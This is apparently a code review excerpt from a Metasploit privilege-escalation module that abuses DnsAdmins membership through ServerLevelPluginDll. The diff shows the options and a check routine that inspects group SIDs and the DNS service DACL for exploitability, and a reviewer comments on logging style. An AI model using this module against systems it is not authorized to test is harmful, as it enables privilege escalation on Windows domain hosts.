modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb

```diff
@@ -0,0 +1,193 @@
+    )
+
+    register_options(
+      [
+        OptString.new('DLLNAME', [ false, 'DLL name (default: msf.dll)', "msf.dll"]),
+        OptString.new('DLLPATH', [ false, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"])
+      ]
+    )
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def check
+    if is_system?
+      print_status("Session is already elevated!")
+      return Exploit::CheckCode::Unknown
+    end
+
+    username = client.sys.config.getuid
+    user_sid = client.sys.config.getsid
+    hostname = sysinfo['Computer']
+    print_status("Running check against #{hostname} as user #{username}...")
+
+    srv_info = service_info("DNS")
+    if srv_info.nil?
+      print_bad("Unable to enumerate the DNS service!")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if srv_info && srv_info[:display].empty?
+      print_bad("The DNS service does not exist on this host!")
+      return Exploit::CheckCode::Safe
+    end
+
+    # for use during permission check
+    dacl_items = srv_info[:dacl].split("D:")[1].split("(")
+    dacl_items.each do |dacl_item|
+      dacl_item.delete_suffix!(")")
+    end
+
+    print_good("DNS service found on #{hostname}.")
+
+    # user must be a member of the DnsAdmins group to be able to change ServerLevelPluginDll
+    group_membership = get_whoami
+    unless group_membership
+      print_bad("Unable to enumerate group membership!")
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless group_membership.include? "DnsAdmins"
+      print_bad("User #{username} is not part of the DnsAdmins group!")
+      return Exploit::CheckCode::Safe
+    end
+
+
+    # find the DnsAdmins group SID
+    dnsadmin_sid = ""
+    group_membership.split("\n").each do |line|
+      unless line.include? "DnsAdmins"
+        next
+      end
+
+      print_good("User #{username} is part of the DnsAdmins group.")
+      line.split.each do |item|
+        unless item.include? "S-"
+          next
+        end
+
+        vprint_status("DnsAdmins SID is #{item}")
+        dnsadmin_sid = item
+        break
+      end
+      break
+    end
+
+    # check if the user or DnsAdmins group has the proper permissions to start/stop the DNS service
+    if dacl_items.any? { |dacl_item| dacl_item.include? dnsadmin_sid }
+      dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item.include? dnsadmin_sid }[0]
+      if dnsadmin_dacl.include? "RPWP"
+        print_good("Members of the DnsAdmins group can start/stop the DNS service.")
+      end
+    elsif dacl_items.any? { |dacl_item| dacl_item.include? user_sid }
+      user_dacl = dacl_items.select { |dacl_item| dacl_item.include? user_sid }[0]
+      if user_dacl.include? "RPWP"
+        print_good("User #{username} can start/stop the DNS service.")
+      end
+    else
+      print_bad("User #{username} does not have permissions to start/stop the DNS service!")
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Vulnerable
+  end
```

Comment:
A `check` method should not use `print_*` methods. One alternative is to use `vprint_*` methods. Another alternative is to provide the printed string with the check code, for example:

```ruby
return Exploit::CheckCode::Safe("User #{username} does not have permissions to start/stop the DNS service!")
```

This second approach is cleaner, except that the error messages will never be printed when `check` is invoked from the `exploit` method.